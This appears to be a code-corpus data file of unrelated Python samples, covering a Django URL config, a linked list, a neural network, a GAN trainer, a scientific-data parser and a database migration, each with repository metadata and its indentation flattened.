colab/apps/issues/urls.py | caseywstark/colab | 1 | 12765042 | from django.conf.urls.defaults import *
from issues.models import Issue
from voting.views import vote_on_object
urlpatterns = patterns("issues.views",
url(r"^$", "issues", name="issue_list"),
url(r"^create/$", "create", name="issue_create"),
url(r"^my_issues/$", "issues", kwargs={'mine': True}, name="my_issues"),
# issue-specific
url(r"^issue/(?P<slug>[-\w]+)/$", "issue", name="issue_detail"),
url(r"^issue/(?P<slug>[-\w]+)/delete/$", "delete", name="issue_delete"),
url(r'^issue/(?P<slug>[-\w]+)/edit/$', "edit", name="issue_edit"),
url(r'^issue/(?P<slug>[-\w]+)/resolve/$', "resolve", name="issue_resolve"),
url(r'^issue/(?P<slug>[-\w]+)/invite/$', "invite", name="issue_invite"),
# issue voting
url(r'^issue/(?P<object_id>\d+)/(?P<direction>up|down|clear)vote/$',
vote_on_object, dict(model=Issue, template_object_name='issue',
allow_xmlhttprequest=True, confirm_vote=False), name="issue_vote"),
)
| 2.046875 | 2 |
data_structures_two/2_linked_list.py | amanalok/python-dsa | 0 | 12765043 | <filename>data_structures_two/2_linked_list.py
class Node:
def __init__(self, data):
self.data = data
self.next = None
def __repr__(self):
return self.data
class LinkedList:
def __init__(self):
self.front = None
self.rear = None
def __repr__(self):
current = self.front
nodes = []
while (current is not None):
nodes.append(current.data)
current = current.next
nodes.append('None')
return '->'.join(nodes)
def __iter__(self):
current = self.front
while (current is not None):
yield current
current = current.next
def add_front(self, data):
node = Node(data)
node.next = self.front
if (self.front is None and self.rear is None):
self.front = node
self.rear = node
else:
self.front = node
def add_rear(self, data):
node = Node(data)
if (self.front is None and self.rear is None):
self.front = node
self.rear = node
else:
self.rear.next = node
self.rear = node
def add_after(self, target_node_data, new_node_data):
if self.front is None:
raise('Linked List is empty !!!')
for node in self:
if node.data == target_node_data:
if node.next is None:
return self.add_rear(new_node_data)
else:
new_node = Node(new_node_data)
new_node.next = node.next
node.next = new_node
return
raise Exception('Node with data {} not found in linked list'
.format(target_node_data))
def add_before(self, target_node_data, new_node_data):
if self.front == None:
raise Exception('Linked List is empty')
if self.front.data == target_node_data:
return self.add_front(new_node_data)
previous_node = self.front
for node in self:
if node.data == target_node_data:
new_node = Node(new_node_data)
new_node.next = node
previous_node.next = new_node
return
previous_node = node
raise Exception('Node with data {} not found in linked list'
.format(target_node_data))
def remove_node(self, target_node_data):
if self.front is None:
raise Exception('Linked List is empty')
if self.front.data == target_node_data:
self.front = self.front.next
return
previous_node = self.front
for node in self:
if node.data == target_node_data:
previous_node.next = node.next
return
previous_node = node
raise Exception('Node with data {} not found in linked list'
.format(target_node_data))
def reverse(self):
if self.front is None:
raise Exception('Linked list is empty')
# self.rear = self.front
prev_node = None
current_node = self.front
while (current_node is not None):
next_node = current_node.next
current_node.next = prev_node
prev_node = current_node
current_node = next_node
self.front = prev_node
def sort(self):
if self.front is None:
raise Exception('Linked list is empty')
for node in self:
next_node = node.next
while next_node is not None:
if node.data > next_node.data:
node.data, next_node.data = next_node.data, node.data
next_node = next_node.next
def singly_single_list():
llist = LinkedList()
foo = 0
for item in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']:
if foo % 2 == 0:
llist.add_front(item)
else:
llist.add_rear(item)
foo += 1
print(llist)
llist.add_after('j', 'o')
llist.add_after('a', 'k')
llist.add_after('f', 'f')
llist.add_after('i', 'n')
llist.add_rear('m')
print(llist)
llist.add_before('i', 'z')
llist.add_before('z', 'y')
llist.add_before('n', 'p')
llist.add_before('m', 'q')
# llist.add_before('x', 'u')
print(llist)
llist.remove_node('y')
llist.remove_node('m')
llist.remove_node('a')
print(llist)
print('*** Reversing linked list ***')
llist.reverse()
print(llist)
llist.sort()
print('*** Sorted linked list ***')
print(llist)
if __name__ == '__main__':
singly_single_list()
| 3.953125 | 4 |
src/scs_dfe/climate/sht_conf.py | open-seneca/alphasense_aq_sensor | 1 | 12765044 | """
Created on 13 Dec 2016
@author: <NAME> (<EMAIL>)
the I2C addresses of the internal (in A4 pot) and external (exposed to air) SHTs
example JSON:
{"int": "0x44", "ext": "0x45"}
"""
from collections import OrderedDict
from scs_core.data.json import PersistentJSONable
from scs_dfe.climate.sht31 import SHT31
# --------------------------------------------------------------------------------------------------------------------
class SHTConf(PersistentJSONable):
"""
classdocs
"""
__FILENAME = "sht_conf.json"
@classmethod
def persistence_location(cls, host):
return host.conf_dir(), cls.__FILENAME
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def __addr_str(cls, addr):
if addr is None:
return None
return "0x%02x" % addr
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict):
if not jdict:
return None
int_str = jdict.get('int')
ext_str = jdict.get('ext')
int_addr = None if int_str is None else int(int_str, 0)
ext_addr = None if ext_str is None else int(ext_str, 0)
return SHTConf(int_addr, ext_addr)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, int_addr, ext_addr):
"""
Constructor
"""
super().__init__()
self.__int_addr = int_addr # int I2C address of SHT in A4 package
self.__ext_addr = ext_addr # int I2C address of SHT exposed to air
# ----------------------------------------------------------------------------------------------------------------
def int_sht(self):
if self.__int_addr is None:
return None
return SHT31(self.__int_addr)
def ext_sht(self):
if self.__ext_addr is None:
return None
return SHT31(self.__ext_addr)
# ----------------------------------------------------------------------------------------------------------------
@property
def int_addr(self):
return self.__int_addr
@property
def ext_addr(self):
return self.__ext_addr
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['int'] = SHTConf.__addr_str(self.__int_addr)
jdict['ext'] = SHTConf.__addr_str(self.__ext_addr)
return jdict
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "SHTConf:{int_addr:%s, ext_addr:%s}" % \
(SHTConf.__addr_str(self.int_addr), SHTConf.__addr_str(self.ext_addr))
| 2.15625 | 2 |
src/NN_4_layer.py | FrankZhang427/ModifiedMNIST | 0 | 12765045 | <gh_stars>0
# This file implements the 4-layer fully-connected feedforward neuron network. The activation function is tanh and softmax is implemented at the output layer. A weighting function is incorporated in the gradient descent process to deal with imbalanced training classes. Different hyper-parameters can be specified at the beginning of the two files, and accuracies and unweighted losses will be output during training.
# NOTE: You may need to delete the comment on the forth line to execute the file.
# The struction of the network is essentially the same as that given in [1] and the code for the self-defined functions is based on that in [1].
# Reference: [1]. <NAME>, Implementing a Neural Network from Scratch in Python – An Introduction, 2015. [Online]. Available: http://www.wildml.com/2015/09/implementing-a-neural-network-from-scratch/. [Accessed: 12-Nov.-17].
#
# Author: <NAME>. Last modified 12 Nov, 2017.
# Parameters
# Input and output training file names
filename_y="train_y.csv"
filename_x="train_x.csv"
test_size=0.2 # The proportion of the test set to be used in validation
# Network and gradient descent parameters
input_dim = 4096 # input layer dimensionality
output_dim = 40 # output layer dimensionality
hdim1=128 # The number of nodes in hidden layer 1 (the second hidden layer)
hdim0_range=[256,512,1024] # The number of nodes in the first hidden layer
epsilon_range = [0.01,0.008,0.012] # Learning rate for gradient descent
num_passes_current=1000 # Number of updates to be performed
print_interval_current=50 # Interval for performance metrics' output
import numpy as np
# The three functions has been taken from [1] and modified to suit the 4-layer network. Besides, the third one has been modified to incorporate weighting of classes, to display different information, and to enable specification of more parameters when calling the function.
# 1. Function to evaluate the total loss on the dataset
def calculate_loss(model, x, y):
num_examples=len(x)
W0,b0,W1, b1, W2, b2 = model['W0'], model['b0'],model['W1'], model['b1'], model['W2'], model['b2']
# Forward propagation to calculate our predictions
z0 = x.dot(W0) + b0
a0 = np.tanh(z0)
z1 = a0.dot(W1) + b1
a1 = np.tanh(z1)
z2 = a1.dot(W2) + b2
exp_scores = np.exp(z2)
probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True)
#** Calculating the loss
corect_logprobs = -np.log(probs[range(num_examples), y])
data_loss = np.sum(corect_logprobs) # 40 possible outcomes encoded using 1-hot encoding
return 1./num_examples * data_loss
# 2. Function to predict the output (40 possible outcomes encoded using 1-hot encoding)
def predict(model, x):
W0,b0,W1, b1, W2, b2 = model['W0'], model['b0'],model['W1'], model['b1'], model['W2'], model['b2']
# Forward propagation to calculate our predictions
z0 = x.dot(W0) + b0
a0 = np.tanh(z0)
z1 = a0.dot(W1) + b1
a1 = np.tanh(z1)
z2 = a1.dot(W2) + b2
exp_scores = np.exp(z2)
probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True)
return np.argmax(probs, axis=1)
# 3. This function learns parameters for the neural network and returns the model.
# - hdim1: Number of nodes in the first hidden layer
# - num_passes: Number of passes through the training data for gradient descent
# - print_loss: If True, print the loss and accuracy every print_interval iterations
# - training: If training=True, both training set and validation set need to be input, i.e. X, Y, X_val and Y_val all need to be fed, and the validation error will be output as well print_loss=True.
def build_model(hdim0,hdim1, X, Y,training=False, X_val=None, Y_val=None, num_passes=2000, print_loss=False, print_interval=10):
num_examples=len(train_x) # training set size
#** Initialize the parameters to random values
np.random.seed(45)
W0 = np.random.randn(input_dim, hdim0) / np.sqrt(input_dim)
b0 = np.zeros((1, hdim0))
W1 = np.random.randn(hdim0, hdim1) / np.sqrt(hdim0)
b1 = np.zeros((1, hdim1))
W2 = np.random.randn(hdim1, output_dim) / np.sqrt(hdim1)
b2 = np.zeros((1, output_dim))
# This is what we return at the end
model = {}
loss=[]
loss_val=[]
accuracy=[]
accuracy_val=[]
# Weigh the classes such that misclassifying a less probable outcome gives a larger penalty (by weighing the parameters in obtaining learning rates)
#from sklearn.utils import class_weight
#class_weight = class_weight.compute_class_weight('balanced', np.unique(Y), Y)
weights=np.zeros(40)
classes=np.unique(Y)
for i in range(len(classes)):
weights[classes[i]]=2/float(list(Y).count(classes[i]))
print "The weights are:"
print weights
# Gradient descent. For each batch...
for i in range(0, num_passes):
# Forward propagation
z0 = X.dot(W0) # num_examples*hdim1
a0 = np.tanh(z0) # num_examples*hdim1
z1 = a0.dot(W1) # num_examples*hdim1
a1 = np.tanh(z1) # num_examples*hdim1
z2 = a1.dot(W2) # num_examples*output_dim
exp_scores = np.exp(z2) # num_examples*output_dim
probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # num_examples*output_dim
# Backpropagation
delta3 = probs # num_examples*output_dim
delta3[range(num_examples), Y] -= 1
temp=weights[Y] # num_examples*1
delta3=delta3*temp[:, np.newaxis]
dW2 = (a1.T).dot(delta3) # hdim1*output_dim
db2 = np.sum(delta3, axis=0, keepdims=True) # 1*output_dim
delta2 = delta3.dot(W2.T) * (1 - np.power(a1, 2)) # num_examples*hdim1
dW1 = np.dot(a0.T, delta2) # input_dim*hdim1
db1 = np.sum(delta2, axis=0) # 1*hdim1
delta1 = delta2.dot(W1.T) * (1 - np.power(a0, 2))
dW0 = np.dot(X.T, delta1) # input_dim*hdim0
db0 = np.sum(delta1, axis=0) # 1*hdim0
# Gradient descent parameter update
W0 += -epsilon * dW0
b0 += -epsilon * db0
W1 += -epsilon * dW1
b1 += -epsilon * db1
W2 += -epsilon * dW2
b2 += -epsilon * db2
# Assign new parameters to the model
model = { 'W0':W0,'b0':b0,'W1': W1, 'b1': b1, 'W2': W2, 'b2': b2}
# Optionally print the loss
if print_loss and (i+1) % print_interval == 0:
loss_current=calculate_loss(model,X,Y)
print "Loss after iteration %i on training set: %f" %(i, loss_current)
loss.append(loss_current)
# Calculate the achieved accuracy on the training set
y_train=predict(model,X)
accuracy.append(np.sum(Y==y_train)/float(len(Y)))
print "Accuracy after iteration %i on training set: %f" %(i, accuracy[-1])
if training==True:
loss_current_val=calculate_loss(model,X_val,Y_val)
print "Loss after iteration %i on validation set: %f" %(i, loss_current_val)
loss_val.append(loss_current_val)
# Calculate the achieved accuracy on the training set
y_val=predict(model,X_val)
accuracy_val.append(np.sum(y_val==Y_val)/float(len(Y_val)))
print "Accuracy after iteration %i on training set: %f" %(i, accuracy[-1])
if (i+1) % (print_interval*10)==0:
print "The loss and accuracy in time so far on the training set are:"
print loss
print accuracy
if training==True:
print "The loss and accuracy in time so far on the validation set are:"
print loss_val
print accuracy_val
if i==num_passes-1:
print "The final accuracy on the test set is "+str(accuracy[-1])
if training==True:
print "The final accuracy on the train set is "+str(accuracy_val[-1])
return model
import pickle
# Load the input data in the training set
X = np.loadtxt(filename_x, delimiter=",") # load from text
#X = pickle.load(open('x.pkl',"rb"))
X=X.reshape(-1,4096)
# Filter the input values and convert them into binary ones
X[X<200]=0
X[X>200]=1
# Load the output results in the training set
y=[]
# Convert the output results to their corresponding class indices
with open(filename_y,'r') as fin:
for x in fin:
x=int(x)
if x<19:
temp=x
elif x==20:
temp=19
elif x==21:
temp=20
elif x==24:
temp=21
elif x==25:
temp=22
elif x==27:
temp=23
elif x==28:
temp=24
elif x==30:
temp=25
elif x==32:
temp=26
elif x==35:
temp=27
elif x==36:
temp=28
elif x==40:
temp=29
elif x==42:
temp=30
elif x==45:
temp=31
elif x==48:
temp=32
elif x==49:
temp=33
elif x==54:
temp=34
elif x==56:
temp=35
elif x==63:
temp=36
elif x==64:
temp=37
elif x==72:
temp=38
elif x==81:
temp=39
y.append(temp)
y=np.array(y)
y.reshape(-1,1)
Y=y
# Build a model with a 4-dimensional hidden layer
num=0
time=0
total_size=len(X)
for hdim0 in hdim0_range: # The number of nodes
for epsilon in epsilon_range: # learning rate for gradient descent
#for time in range(5):
# train_x,train
num+=1
test_x=X[int(len(X)*test_size*time):int(len(X)*test_size*(time+1))]
train_x=X[int(len(X)*test_size*(time+1)):total_size]
test_y=Y[int(len(X)*test_size*time):int(len(X)*test_size*(time+1))]
train_y=Y[int(len(X)*test_size*(time+1)):total_size]
print "Iteration "+str(num)+" starts----------------"
print "Learning rate is "+str(epsilon)
print "There are "+str(hdim0)+" neurons in the hidden layer"
model = build_model(hdim0,hdim1, train_x, train_y, training=True, X_val=test_x, Y_val=test_y, print_loss=True,num_passes=num_passes_current,print_interval=print_interval_current)
| 3.59375 | 4 |
code/1M_mouse_brain/run_scanorama_1M.py | jhu99/vipcca_paper | 0 | 12765046 | import scxx.preprocessing as pp
import scxx.plotting as pl
import scanorama
import os
import numpy as np
import scanpy as sc
from anndata import AnnData
np.random.seed(0)
NAMESPACE = 'mouse_brain'
BATCH_SIZE = 1000
result_dir="./results/1M_mouse_brain/scanorama/"
data_names = [
'data/mouse_brain/nuclei',
'data/mouse_brain/dropviz/Cerebellum_ALT',
'data/mouse_brain/dropviz/Cortex_noRep5_FRONTALonly',
'data/mouse_brain/dropviz/Cortex_noRep5_POSTERIORonly',
'data/mouse_brain/dropviz/EntoPeduncular',
'data/mouse_brain/dropviz/GlobusPallidus',
'data/mouse_brain/dropviz/Hippocampus',
'data/mouse_brain/dropviz/Striatum',
'data/mouse_brain/dropviz/SubstantiaNigra',
'data/mouse_brain/dropviz/Thalamus',
]
import pandas as pd
genelist = pd.read_csv("./data/scanorama_data/data/mouse_brain/genelist_vipcca.txt",header=None,index_col=0).index
datasets=[]
for i in range(len(data_names)):
name=data_names[i]
ann = pp.read_sc_data("./data/scanorama_data/"+name+"/data.h5ad",batch_name=str(i))
ann=ann[:,genelist]
ann.write("./data/scanorama_data/"+name+"/data_subset.h5ad")
datasets.append(ann)
integrated, corrected = scanorama.correct_scanpy(datasets, return_dimred=True, dimred=16)
scanorama_X=integrated[0]
adata_corrected=corrected[0]
adata_corrected.obs=datasets[0].obs
for i in np.arange(1,len(integrated)):
scanorama_X=np.concatenate([scanorama_X,integrated[i]])
adata_i=corrected[i]
adata_i.obs=datasets[i].obs
adata_corrected=adata_corrected.concatenate(adata_i,index_unique=None)
adata_corrected.raw=adata_corrected.copy()
adata_corrected.X=adata_corrected.X.todense()
adata_corrected.obsm["X_scanorama"]=scanorama_X
adata_corrected.obs_names_make_unique()
# 1,094,150
adata_corrected.write(result_dir+"output.h5ad")
| 2.28125 | 2 |
where/parsers/eop_bulletin_a.py | ingridfausk/where | 16 | 12765047 | <reponame>ingridfausk/where
"""A parser for reading data from EOP files
Description:
------------
Reads data from EOP files.
"""
# Midgard imports
from midgard.dev import plugins
from midgard.math.unit import Unit
from midgard.parsers._parser_line import LineParser
@plugins.register
class EopBulletinAParser(LineParser):
"""A parser for reading data from EOP files
"""
def setup_parser(self):
return dict(
delimiter=(
2,
2,
2,
1,
8,
1,
1,
1,
9,
9,
1,
9,
9,
2,
1,
10,
10,
1,
7,
7,
2,
1,
1,
9,
9,
1,
9,
9,
10,
10,
11,
10,
10,
),
dtype="i2, i2, i2, u1, f8, u1, u1, u1, f8, f8, u1, f8, f8, u2, u1, f8,f8, u1, f8,f8, u2,u1,u1,f8,f8,u1,f8,f8,f8,f8,f8,f8,f8",
names=[
"year",
"month",
"day",
"blank",
"mjd",
"blank",
"pm_flag",
"blank",
"x",
"x_ferr",
"blank",
"y",
"y_ferr",
"blank",
"ut1_utc_flag",
"ut1_utc",
"ut1_utc_ferr",
"blank",
"lod",
"lod_ferr",
"blank",
"nut_flag",
"blank",
"dx",
"dx_ferr",
"blank",
"dy",
"dy_ferr",
"b_x",
"b_y",
"b_ut1_utc",
"b_dx",
"b_dy",
],
autostrip=True,
)
def structure_data(self):
self._array["lod"] *= Unit.ms2s
self._array["dx"] *= Unit.milliarcsec2arcsec
self._array["dy"] *= Unit.milliarcsec2arcsec
self.data = {
item["mjd"]: dict(
x=item["x"],
y=item["y"],
ut1_utc=item["ut1_utc"],
lod=item["lod"],
dx=item["dx"],
dy=item["dy"],
source="bulletin_a",
)
for item in self._array
}
| 2.078125 | 2 |
minos/data_generation/US_missing_deterministic.py | RobertClay/Paper1 | 0 | 12765048 | <gh_stars>0
"""For correcting missing data that is deterministic on other attributes."""
import pandas as pd
import numpy as np
import US_utils
import US_missing_description
def det_missing(data, columns, conditioner, replacer):
"""Correct data that is deterministically missing.
Requires a data frame, a column to correct, a condition function for correction,
and a function which decides what to replace missing values with.
Examples
--------
data : US data frame
columns : List of columns to update deterministically.
conditioner : function that returns True if a person is unemployed. False otherwise.
replacer: function that returns 0 regardless of other individual attributes.
Parameters
----------
data : pd.DataFrame
The data to correct data for.
columns : list
Which column to correct data for.
conditioner, replacer : func
A conditional function which takes the data and returns a column of booleans.
These booleans determine which individuals are having data replaced.
Replacer will determine what these missing values are replaced with.
This can be a simple deterministic function, or determined by within/cross individual attributes.
Returns
-------
"""
missing_types = ['-1', '-2', '-7', '-8', '-9',
-1, -2, -7, -8, -9,
'-1.0', '-2.0', '-7.0', '-8.0', '-9.0',]
# Calculate people who are unemployed (labour state 2) but registered as missing in SIC codes.
# Assign these people 0 value SIC/SOC/NSSEC codes. Also set their job duration to 0.
for column in columns:
who_missing = data[column].isin(missing_types)
who_condition = conditioner(data)
missing_because_condition = who_missing & who_condition
mbc_index = missing_because_condition.loc[missing_because_condition].index
data = replacer(data, mbc_index, column)
return data
def is_unemployed(data):
"""Check who has reason to be unemployed. Students etc. may be employed but if not missing SIC code for example it
doesn't matter.
Parameters
----------
data: pd.DataFrame
Data frame to determine whether individuals are unemployed or not.
Returns
-------
who: pd.Series
A column of bools determining whether a person is unemployed or not.
"""
# TODO this condition needs expanding. Needs to be that they have no other job information available as well.
# Some students can be employed and be missing only one of SIC/SOC codes. These values are truly missing.
# These people ARE employed and this current condition incorrectly replaces their job with nothing..
who = data["labour_state"].isin(["Unemployed", "Family Care", "Student", "Sick/Disabled", "Retired"])
return who
def force_zero(data, index, column):
"""
Parameters
----------
data
index
column
Returns
-------
"""
data.loc[index, column] = "0"
return data
def force_nine(data, index, column):
"""
Parameters
----------
data
index
column
Returns
-------
"""
data.loc[index, column] = "-10.0"
return data
def main():
# Load in data.
years = np.arange(1990, 2019)
file_names = [f"data/raw_US/{item}_US_cohort.csv" for item in years]
data = US_utils.load_multiple_data(file_names)
# Table of missing values by row/column after correction.
before = US_missing_description.missingness_table(data)
unemployed_columns = ["job_industry",
"job_duration_m",
"job_duration_y",
#"job_sec",
"job_occupation"]
# force unemployed people to have value 0 in unemployed_columns.
data = det_missing(data, unemployed_columns, is_unemployed, force_zero)
# table of missing values by row/column after correction.
after = US_missing_description.missingness_table(data)
US_utils.save_multiple_files(data, years, 'data/deterministic_US/', "")
return data, before, after
if __name__ == "__main__":
data, before, after = main() | 3.65625 | 4 |
share/gan_face/train_gan.py | tomsnail/opencv_tf_py | 0 | 12765049 | #-*- coding:utf-8 -*-
from generate_face import *
from gan_model import ganModel
import tensorflow as tf
if __name__ == '__main__':
hparams = tf.contrib.training.HParams(
data_root = './../../datas/gan_face/img_align_celeba',
crop_h = 108, #对原始图片裁剪后高
crop_w = 108, #对原始图片裁剪后宽
resize_h = 64, #对裁剪后图片缩放的高
resize_w = 64, #对裁剪图片缩放的宽
is_crop = True, #是否裁剪
z_dim = 100, #随机噪声z的维度,用户generator生成图片
batch_size = 64, #批次
sample_size = 64,#选取作为测试样本
output_h = 64, #generator生成图片的高
output_w = 64, #generator生成图片的宽
gf_dim = 64, #generator的feature map的deep
df_dim = 64) #discriminator的feature map的deep
face = generateFace(hparams)
sample_images,sample_z = face.get_sample(hparams.sample_size)
is_training = tf.placeholder(tf.bool,name='is_training')
images = tf.placeholder(tf.float32, [None,hparams.resize_h,hparams.output_w,3],name='real_images')
z = tf.placeholder(tf.float32, [None,hparams.z_dim], name='z')
model = ganModel(hparams)
g_loss,d_loss,g_vars,d_vars,g_sum,d_sum,G = model.build_model(is_training,images,z)
d_optim,g_optim = model.optimizer(g_loss,d_loss,g_vars,d_vars)
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state('./../../datas/model/share/gan_face/')
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
print("Reading model parameters from %s" % ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
print("Created model with fresh parameters.")
sess.run(tf.global_variables_initializer())
summary_writer = tf.summary.FileWriter("train_gan", sess.graph)
step = 0
while True:
step = model.global_step.eval()
batch_images,batch_z = face.next_batch(hparams.batch_size)
#Update D network
_, summary_str = sess.run([d_optim,d_sum],
feed_dict={images:batch_images, z:batch_z, is_training:True})
summary_writer.add_summary(summary_str,step)
#Update G network
_, summary_str = sess.run([g_optim,g_sum],
feed_dict={z:batch_z, is_training:True})
summary_writer.add_summary(summary_str,step)
d_err = d_loss.eval({images:batch_images, z:batch_z, is_training:False})
g_err = g_loss.eval({z:batch_z,is_training:False})
print("step:%d,d_loss:%f,g_loss:%f" % (step,d_err,g_err))
if step%1000 == 0:
samples, d_err, g_err = sess.run([G,d_loss,g_loss],
feed_dict={images:sample_images, z:sample_z, is_training:False})
print("sample step:%d,d_err:%f,g_err:%f" % (step,d_err,g_err))
save_images(samples,image_manifold_size(samples.shape[0]), './../../datas/train/share/gan_face/samples/train_{:d}.png'.format(step))
saver.save(sess,"./../../datas/model/share/gan_face/gans.ckpt",global_step = step) | 2.265625 | 2 |
server/kraken/migrations/versions/5b13b262b132_added_repo_changes.py | fossabot/kraken-3 | 66 | 12765050 | <filename>server/kraken/migrations/versions/5b13b262b132_added_repo_changes.py<gh_stars>10-100
"""added repo changes
Revision ID: 5b13b262b132
Revises: <KEY>
Create Date: 2021-04-07 06:02:59.604892
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.sql import insert
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
conn = op.get_bind()
orm.Session(bind=conn)
rc_tbl = op.create_table('repo_changes',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=False),
sa.Column('deleted', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('data', postgresql.JSONB(astext_type=sa.Text()), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.add_column('flows', sa.Column('trigger_data_id', sa.Integer()))
op.create_foreign_key('flows_trigger_data_id_fkey', 'flows', 'repo_changes', ['trigger_data_id'], ['id'])
op.add_column('runs', sa.Column('repo_data_id', sa.Integer()))
op.create_foreign_key('runs_repo_data_id_fkey', 'runs', 'repo_changes', ['repo_data_id'], ['id'])
print('updating flows')
res = conn.execute("SELECT id, created, trigger_data FROM flows WHERE trigger_data IS NOT NULL AND trigger_data::text != 'null'")
for flow_id, created, d in res.fetchall():
if isinstance(d, dict):
d = [d]
rc = {'created': created, 'updated': created, 'data': d}
ret = conn.execute(insert(rc_tbl).values(rc).returning(rc_tbl.c.id))
d_id = ret.fetchone()[0]
print('flow: %d repo_changes %d' % (flow_id, d_id))
conn.execute("UPDATE flows SET trigger_data_id = %d WHERE id = %d" % (d_id, flow_id))
print('updating runs')
res = conn.execute("SELECT id, created, repo_data FROM runs WHERE repo_data IS NOT NULL AND repo_data::text != 'null'")
for run_id, created, d in res.fetchall():
if isinstance(d, dict):
new_ds = []
for url, commits in d.items():
new_d = {}
new_d['repo'] = url
new_d['trigger'] = 'git-push'
new_commits = []
for c in commits:
nc = dict(id=c['commit'],
author=dict(name=c['author'], email=c['email']),
timestamp=c['date'],
message=c['subject'])
new_commits.append(nc)
new_d['commits'] = new_commits
new_d['before'] = new_commits[-1]['id']
new_d['after'] = new_commits[0]['id']
new_ds.append(new_d)
d = new_ds
rc = {'created': created, 'updated': created, 'data': d}
ret = conn.execute(insert(rc_tbl).values(rc).returning(rc_tbl.c.id))
d_id = ret.fetchone()[0]
print('run: %d repo_changes %d' % (run_id, d_id))
conn.execute("UPDATE runs SET repo_data_id = %d WHERE id = %d" % (d_id, run_id))
#op.drop_column('flows', 'trigger_data')
#op.drop_column('runs', 'repo_data')
def downgrade():
# op.add_column('runs', sa.Column('repo_data', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=True))
op.drop_constraint('runs_repo_data_id_fkey', 'runs', type_='foreignkey')
op.drop_column('runs', 'repo_data_id')
# op.add_column('flows', sa.Column('trigger_data', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=True))
op.drop_constraint('flows_trigger_data_id_fkey', 'flows', type_='foreignkey')
op.drop_column('flows', 'trigger_data_id')
op.drop_table('repo_changes')
| 1.757813 | 2 |